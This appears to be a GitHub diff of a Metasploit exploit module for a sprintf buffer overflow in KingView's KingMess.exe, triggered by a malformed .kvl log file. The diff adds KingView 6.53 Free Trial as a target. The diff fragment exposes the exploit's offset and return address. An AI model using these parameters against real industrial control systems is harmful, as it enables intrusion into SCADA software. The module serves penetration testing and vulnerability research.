File tree Expand file tree Collapse file tree 1 file changed +3
-2
lines changed
modules/exploits/windows/fileformat Expand file tree Collapse file tree 1 file changed +3
-2
lines changed Original file line number Diff line number Diff line change @@ -20,7 +20,8 @@ def initialize(info={})
20
20
the KingMess.exe application when handling log files, due to the insecure usage of
21
21
sprintf. This module uses a malformed .kvl file which must be opened by the victim
22
22
via the KingMess.exe application, through the 'Browse Log Files' option. The module
23
- has been tested successfully on KingView 6.52 over Windows XP SP3.
23
+ has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over
24
+ Windows XP SP3.
24
25
} ,
25
26
'License' => MSF_LICENSE ,
26
27
'Author' =>
@@ -50,7 +51,7 @@ def initialize(info={})
50
51
'Platform' => 'win' ,
51
52
'Targets' =>
52
53
[
53
- [ 'KingView 6.52 English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3' ,
54
+ [ 'KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3' ,
54
55
{
55
56
'Offset' => 295 ,
56
57
'Ret' => 0x77c35459 # push esp # ret # msvcrt.dll
You can’t perform that action at this time.
0 commit comments